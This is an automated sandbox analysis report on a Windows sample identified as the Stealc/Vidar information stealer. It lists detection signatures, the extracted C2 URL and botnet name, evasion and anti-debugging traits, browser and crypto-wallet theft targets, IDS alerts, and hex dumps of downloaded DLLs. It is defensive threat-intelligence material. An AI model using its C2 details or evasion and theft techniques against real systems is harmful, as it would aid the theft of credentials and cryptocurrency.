Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1541053
MD5:	e13d89812ee808b7637fe554797b759b
SHA1:	d392ee05ccd8da3985594fc8deb0ecdd5a23e8fb
SHA256:	2fe1592ed1c0bd162f4de4abb3a023ed7eac5426acf02b5df89ae163449d7c5f
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.320000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.320000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00329B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00329B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0032C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00327240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00327240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00329AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00329AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00338EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00338EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2388576619.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2387843050.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00334910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0032E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0032BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00333EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00333EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003216D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003338B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0032ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00334570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00334570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0032DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0032DE10

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:25 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:27 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:28 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 